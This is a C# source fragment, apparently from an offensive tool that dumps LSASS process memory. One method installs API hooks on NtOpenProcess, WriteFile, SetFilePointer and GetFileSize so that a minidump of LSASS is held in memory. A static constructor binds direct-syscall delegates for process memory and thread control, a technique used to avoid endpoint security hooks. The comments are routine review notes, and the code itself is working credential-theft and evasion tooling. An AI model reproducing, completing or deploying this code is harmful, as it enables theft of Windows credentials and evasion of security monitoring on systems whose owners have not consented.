/// <summary>
/// Installs the user-mode API hooks used by this class and registers the
/// <see cref="DumpContext"/> for <paramref name="contextHandle"/>.
/// </summary>
/// <param name="contextHandle">Key under which a new <see cref="DumpContext"/> is stored in
/// <c>dumpContexts</c>; an entry already present for the same handle is overwritten.</param>
/// <param name="dumpSizeLimit">Forwarded unchanged to the <see cref="DumpContext"/> constructor.</param>
/// <param name="lsassPid">Copied into the static <c>MiniDumpToMem.lsassPid</c>.</param>
/// <param name="lsassHandle">Copied into the static <c>MiniDumpToMem.lsassHandle</c>.</param>
/// <remarks>
/// Statement order is significant: the detour delegates are assigned first, each hook is
/// created through <c>hookEngine.CreateHook</c>, and only afterwards are all hooks enabled
/// in one step by <c>EnableHooks</c>.
/// NOTE(review): a second call replaces <c>hookEngine</c> without disabling the hooks the
/// previous instance installed - confirm whether <c>HookEngine</c> tolerates that.
/// </remarks>
internal static void InitHookEngine(IntPtr contextHandle, uint dumpSizeLimit, int lsassPid, IntPtr lsassHandle)
{
    hookEngine = new HookEngine();
    dumpContexts[contextHandle] = new DumpContext(dumpSizeLimit);
    MiniDumpToMem.lsassPid = lsassPid;
    MiniDumpToMem.lsassHandle = lsassHandle;

    // The detours live in static fields rather than locals; presumably this keeps each
    // delegate rooted for as long as native code holds its function pointer - verify
    // against HookEngine before changing it.
    SetFilePointer_detour = new SetFilePointerDelegate(SetFilePointer);
    GetFileSize_detour = new GetFileSizeDelegate(GetFileSize);
    WriteFile_detour = new WriteFileDelegate(WriteFile);
    NtOpenProcess_detour = new NtOpenProcessDelegate(NtOpenProcess);

    // CreateHook returns a value that is kept in the matching *_orig field; how the
    // detour methods use it is not visible in this block.
    NtOpenProcess_orig = hookEngine.CreateHook("ntdll.dll", "NtOpenProcess", NtOpenProcess_detour);
    SetFilePointer_orig = hookEngine.CreateHook("kernelbase.dll", "SetFilePointer", SetFilePointer_detour);
    GetFileSize_orig = hookEngine.CreateHook("kernelbase.dll", "GetFileSize", GetFileSize_detour);
    WriteFile_orig = hookEngine.CreateHook("kernelbase.dll", "WriteFile", WriteFile_detour);

    // All hooks become active together; nothing above is live until this call.
    hookEngine.EnableHooks();
}
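/// <summary>
/// Type initializer: binds every <c>fNt*</c> delegate to the entry recorded in
/// <c>Syscalls</c> for the Windows version reported by <c>OsChecker.GetWindowsVersion</c>.
/// </summary>
/// <exception cref="PlatformNotSupportedException">
/// Thrown when the detected version is <c>OsChecker.EWindowsVersion.Unknown</c> or has no
/// entry in <c>Syscalls</c>. Because this is a static constructor, the runtime delivers it
/// to the first member access wrapped in a <see cref="TypeInitializationException"/>.
/// </exception>
static Syscall()
{
    var windowsVersion = OsChecker.GetWindowsVersion();

    // One lookup instead of ContainsKey followed by eleven indexer reads. Unknown is
    // rejected explicitly so that adding a table row for it later cannot silently
    // bind delegates on an unrecognised build.
    if (windowsVersion == OsChecker.EWindowsVersion.Unknown
        || !Syscalls.TryGetValue(windowsVersion, out var table))
    {
        // Specific exception type instead of bare Exception; still caught by any
        // existing catch (Exception) handler.
        throw new PlatformNotSupportedException("Unsupported operating system !");
    }

    fNtOpenProcess = GetDelegateForSyscall<NtOpenProcessDelegate>(table.NtOpenProcess);
    fNtReadVirtualMemory = GetDelegateForSyscall<NtReadVirtualMemoryDelegate>(table.NtReadVirtualMemory);
    fNtWriteVirtualMemory = GetDelegateForSyscall<NtWriteVirtualMemoryDelegate>(table.NtWriteVirtualMemory);
    fNtAllocateVirtualMemory = GetDelegateForSyscall<NtAllocateVirtualMemoryDelegate>(table.NtAllocateVirtualMemory);
    // Delegate type name keeps the project's existing spelling (missing 'y').
    fNtProtectVirtualMemory = GetDelegateForSyscall<NtProtectVirtualMemorDelegate>(table.NtProtectVirtualMemory);
    fNtFreeVirtualMemory = GetDelegateForSyscall<NtFreeVirtualMemoryDelegate>(table.NtFreeVirtualMemory);
    fNtClose = GetDelegateForSyscall<NtCloseDelegate>(table.NtClose);
    fNtQueryInformationProcess = GetDelegateForSyscall<NtQueryInformationProcessDelegate>(table.NtQueryInformationProcess);
    fNtOpenThread = GetDelegateForSyscall<NtOpenThreadDelegate>(table.NtOpenThread);
    fNtSuspendThread = GetDelegateForSyscall<NtSuspendThreadDelegate>(table.NtSuspendThread);
    fNtResumeThread = GetDelegateForSyscall<NtResumeThreadDelegate>(table.NtResumeThread);
}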